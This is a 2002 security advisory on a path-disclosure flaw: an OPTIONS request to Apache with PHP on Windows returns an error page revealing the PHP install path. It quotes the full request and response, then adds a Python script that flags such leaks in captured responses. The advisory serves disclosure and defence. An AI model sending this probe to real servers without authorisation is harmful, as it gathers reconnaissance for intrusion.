PHP Advisory #2

From: Paul Brereton (brereton_paul@btopenworld.com)
Date: 02/07/02


From: "Paul Brereton" <brereton_paul@btopenworld.com>
To: <bugs@securitytracker.com>, <webmaster@hideaway.net>, <contact@securitybugware.org>, <exploit@nstalker.com>, <security@winnetmag.com>, <editors@apacheweek.com>, <bugtraq@securityfocus.com>
Date: Thu, 7 Feb 2002 12:03:00 -0000

Title : PHP Reveals True Path (OPTIONS)
Author : Paul Brereton
E-Mail : brereton_paul@btopenworld.com

Summary : When a web administrator installs Apache with PHP and adds
index.php to the Apache configuration file, Apache first looks for index.php
when sending back the default web page for this directory. This opens up a
security weakness that allows remote attackers to gain sensitive information
about the directory structure of the Apache and PHP installation.

Details : Sending an OPTIONS request to the web server reveals the
installation path of PHP.

Example:
The OPTIONS output is shown here:

> OPTIONS / HTTP/1.1
> Host: 192.168.1.2
> Accept: */*

< HTTP/1.1 500 Internal Server Error
< Date: Sun, 03 Feb 2002 10:56:53 GMT
< Server: Apache/2.0.28 (Win32)
< Vary: accept-language
< Accept-Ranges: bytes
< Content-Length: 680
< Connection: close
< Content-Type: text/html; charset=ISO-8859-1

< <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
< <HTML>
< <HEAD>
< <TITLE>Server error!</TITLE>
< <LINK REV="made" HREF="mailto:admin@192.168.1.2">
< </HEAD>
<
< <BODY BGCOLOR="#FFFFFF" TEXT="#000000" LINK="#0000CC">
< <H1>Server error!</H1>
< <DL>
< <DD>
<
<
<
< handler "cgi-script" not found for: C:/php/php.exe
<
<
< </DL><DL><DD>
<If you think this is a server error, please contact
<the <A HREF="mailto:admin@192.168.1.2">Webmaster</A>
<
< </DL>
<
< <H2>Error 500</H2>
< <DL>
< <DD>
< <ADDRESS>
< 192.168.1.2
< <BR>
<
< <small>02/03/02 10:56:53</small>
< <BR>
< <small>Apache/2.0.28 (Win32)</small>
< </ADDRESS>
< </DL>
< </BODY>
< </HTML>
<

As you can see, the line 'handler "cgi-script" not found for: C:/php/php.exe'
reveals the install path of PHP.
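
An added example, not part of the original advisory: a check an administrator could run over captured responses from their own server to flag error pages that disclose absolute filesystem paths, as the 500 page above does. The function name, the regular expression and both sample responses are assumptions constructed for illustration; the first sample is abridged from the output quoted above.

```python
import re

# Constructed sample: abridged copy of the 500 response quoted in the advisory.
SAMPLE_RESPONSE = (
    "HTTP/1.1 500 Internal Server Error\r\n"
    "Server: Apache/2.0.28 (Win32)\r\n"
    "Content-Type: text/html; charset=ISO-8859-1\r\n"
    "\r\n"
    "<HTML><BODY><H1>Server error!</H1>\n"
    'handler "cgi-script" not found for: C:/php/php.exe\n'
    "</BODY></HTML>\n"
)

# Constructed sample: an OPTIONS response that discloses nothing.
CLEAN_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Allow: GET,HEAD,POST,OPTIONS\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
)

# Absolute Windows paths (C:/... or C:\...) and common Unix install roots.
# The lookbehind keeps URL schemes such as "http://" from matching.
PATH_RE = re.compile(
    r"(?<![A-Za-z0-9])(?:[A-Za-z]:[\\/][\w.\-\\/]+"
    r"|/(?:usr|var|opt|etc|home|srv)/[\w.\-/]+)"
)


def find_path_leaks(raw_response):
    """Return (status_code, [paths]) for filesystem paths in the response body."""
    head, _, body = raw_response.partition("\r\n\r\n")
    status_line = head.split("\r\n", 1)[0]
    status = int(status_line.split()[1])
    # Only the body is scanned: headers rarely carry paths, error pages do.
    paths = sorted(set(PATH_RE.findall(body)))
    return status, paths


if __name__ == "__main__":
    for name, raw in (("sample", SAMPLE_RESPONSE), ("clean", CLEAN_RESPONSE)):
        status, paths = find_path_leaks(raw)
        verdict = "LEAK" if paths else "ok"
        print(f"{name}: HTTP {status} {verdict} {paths}")
```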